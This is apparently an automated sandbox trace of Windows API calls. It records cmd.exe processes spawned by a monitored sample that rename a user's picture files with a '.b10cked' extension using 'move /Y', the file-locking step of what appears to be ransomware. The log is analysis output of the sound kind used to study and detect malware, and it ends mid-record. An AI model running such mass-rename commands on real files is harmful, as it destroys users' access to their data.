1 [0143.612] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0143.612] GetEnvironmentStringsW () returned 0x332af0* [0143.612] FreeEnvironmentStringsW (penv=0x332af0) returned 1 [0143.612] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.612] GetConsoleOutputCP () returned 0x1b5 [0143.613] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.613] GetUserDefaultLCID () returned 0x409 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1afb70, cchData=128 | out: lpLCData="0") returned 2 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1afb70, cchData=128 | out: lpLCData="0") returned 2 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1afb70, cchData=128 | out: lpLCData="1") returned 2 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0143.613] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0143.614] GetConsoleTitleW (in: lpConsoleTitle=0x3208e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.614] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.614] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0143.614] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0143.614] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0143.615] _wcsicmp (_String1="move", _String2=")") returned 68 [0143.615] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0143.615] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0143.615] _wcsicmp (_String1="IF", _String2="move") returned -4 [0143.615] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0143.615] _wcsicmp (_String1="REM", _String2="move") returned 5 [0143.615] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0143.617] GetConsoleTitleW (in: lpConsoleTitle=0x1af868, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.618] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0143.618] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0143.618] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0143.618] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0143.618] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0143.618] _wcsicmp (_String1="move", _String2="CD") returned 10 [0143.618] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0143.618] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0143.618] _wcsicmp (_String1="move", _String2="REN") returned -5 [0143.618] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0143.618] _wcsicmp (_String1="move", _String2="SET") returned -6 [0143.618] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0143.618] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0143.618] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0143.618] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0143.618] _wcsicmp (_String1="move", _String2="MD") returned 11 [0143.618] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0143.618] _wcsicmp (_String1="move", _String2="RD") returned -5 [0143.618] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0143.618] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0143.618] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0143.618] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0143.618] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0143.618] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0143.618] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0143.618] _wcsicmp (_String1="move", _String2="VER") returned -9 [0143.618] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0143.618] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0143.618] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0143.618] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0143.618] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0143.618] _wcsicmp (_String1="move", _String2="START") returned -6 [0143.618] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0143.618] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0143.618] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0143.620] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.620] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.620] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af624, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af61c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af61c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0143.621] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0143.621] _wcsicmp (_String1="KYWWKR~1.JPG", _String2=".") returned 61 [0143.621] _wcsicmp (_String1="KYWWKR~1.JPG", _String2="..") returned 61 [0143.621] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\kywwkr~1.jpg")) returned 0x20 [0143.622] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x331e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.622] SetErrorMode (uMode=0x0) returned 0x0 [0143.622] SetErrorMode (uMode=0x1) returned 0x0 [0143.622] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG", nBufferLength=0x104, lpBuffer=0x1aefac, lpFilePart=0x1aef94 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG", lpFilePart=0x1aef94*="KYWWKR~1.JPG") returned 0x26 [0143.622] SetErrorMode (uMode=0x0) returned 0x1 [0143.622] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures" (normalized: "c:\\users\\eebsym5\\pictures")) returned 0x13 [0143.622] _wcsicmp (_String1="KYWWKR~1.JPG", _String2=".") returned 61 [0143.622] _wcsicmp (_String1="KYWWKR~1.JPG", _String2="..") returned 61 [0143.622] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\kywwkr~1.jpg")) returned 0x20 [0143.622] SetErrorMode (uMode=0x0) returned 0x0 [0143.622] SetErrorMode (uMode=0x1) returned 0x0 [0143.622] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG", nBufferLength=0x104, lpBuffer=0x1af428, lpFilePart=0x1af1c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG", lpFilePart=0x1af1c0*="KYWWKR~1.JPG") returned 0x26 [0143.622] SetErrorMode (uMode=0x0) returned 0x1 [0143.622] SetErrorMode (uMode=0x0) returned 0x0 [0143.622] SetErrorMode (uMode=0x1) returned 0x0 [0143.623] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x1af630, lpFilePart=0x1af1c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked", lpFilePart=0x1af1c0*="kYWWkRklabLUzyrJ9.jpg.b10cked") returned 0x37 [0143.623] SetErrorMode (uMode=0x0) returned 0x1 [0143.623] SetLastError (dwErrCode=0x0) [0143.623] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\kywwkrklabluzyrj9.jpg.b10cked")) returned 0xffffffff [0143.623] GetLastError () returned 0x2 [0143.623] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x1aeb3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb3c) returned 0x320e58 [0143.623] FindNextFileW (in: hFindFile=0x320e58, lpFindFileData=0x1aeb3c | out: lpFindFileData=0x1aeb3c) returned 0 [0143.885] GetLastError () returned 0x12 [0143.885] FindClose (in: hFindFile=0x320e58 | out: hFindFile=0x320e58) returned 1 [0143.886] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x331bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x331bd8) returned 0x320e58 [0143.886] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x1aedd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked", lpFilePart=0x0) returned 0x37 [0143.886] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg", nBufferLength=0x104, lpBuffer=0x1aedd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg", lpFilePart=0x0) returned 0x2f [0143.886] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\kywwkrklabluzyrj9.jpg")) returned 0x20 [0143.886] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\kywwkrklabluzyrj9.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\kywwkrklabluzyrj9.jpg.b10cked"), dwFlags=0x3) returned 1 [0143.887] FindClose (in: hFindFile=0x320e58 | out: hFindFile=0x320e58) returned 1 [0143.887] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1aed88 | out: _Buffer=" 1") returned 9 [0143.887] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.887] GetFileType (hFile=0x7) returned 0x2 [0143.887] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0143.887] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1aed14 | out: lpMode=0x1aed14) returned 1 [0143.887] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.887] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1aed48 | out: lpConsoleScreenBufferInfo=0x1aed48) returned 1 [0143.887] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0143.888] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1aed88 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0143.888] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1aed6c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1aed6c*=0x1a) returned 1 [0143.888] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.888] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.888] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.888] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.889] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.889] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.889] SetConsoleInputExeNameW () returned 0x1 [0143.889] GetConsoleOutputCP () returned 0x1b5 [0143.889] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.889] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.889] exit (_Code=0) Process: id = "189" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16de0" os_pid = "0x6dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16651 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16652 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16653 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16654 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 16655 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 16656 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16657 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16658 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16659 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 16660 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16739 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16740 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16741 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16742 start_va = 0xf0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 16743 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 16744 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16745 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16746 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16747 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16748 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16749 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16750 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16751 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16752 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16753 start_va = 0x3f0000 end_va = 0x4b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 16754 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16755 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16756 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16757 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 16758 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 16759 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 16760 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 16761 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 16762 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Thread: id = 245 os_tid = 0xffc [0143.652] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fa44 | out: lpSystemTimeAsFileTime=0x24fa44*(dwLowDateTime=0x8f8dab40, dwHighDateTime=0x1d440a9)) [0143.652] GetCurrentProcessId () returned 0x6dc [0143.652] GetCurrentThreadId () returned 0xffc [0143.652] GetTickCount () returned 0x2ce07 [0143.652] QueryPerformanceCounter (in: lpPerformanceCount=0x24fa3c | out: lpPerformanceCount=0x24fa3c*=20044111979) returned 1 [0143.653] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0143.653] __set_app_type (_Type=0x1) [0143.653] __p__fmode () returned 0x76b331f4 [0143.653] __p__commode () returned 0x76b331fc [0143.653] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0143.653] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0143.653] GetCurrentThreadId () returned 0xffc [0143.653] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xffc) returned 0x38 [0143.653] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.653] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0143.653] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.654] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0143.654] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24f9d4 | out: phkResult=0x24f9d4*=0x0) returned 0x2 [0143.654] VirtualQuery (in: lpAddress=0x24fa0b, lpBuffer=0x24f9a4, dwLength=0x1c | out: lpBuffer=0x24f9a4*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.654] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24f9a4, dwLength=0x1c | out: lpBuffer=0x24f9a4*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0143.654] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24f9a4, dwLength=0x1c | out: lpBuffer=0x24f9a4*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0143.654] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24f9a4, dwLength=0x1c | out: lpBuffer=0x24f9a4*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.654] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24f9a4, dwLength=0x1c | out: lpBuffer=0x24f9a4*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0143.654] GetConsoleOutputCP () returned 0x1b5 [0143.654] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.654] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0143.654] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.654] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0143.654] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.655] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.655] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.655] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.655] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.655] _get_osfhandle (_FileHandle=0) returned 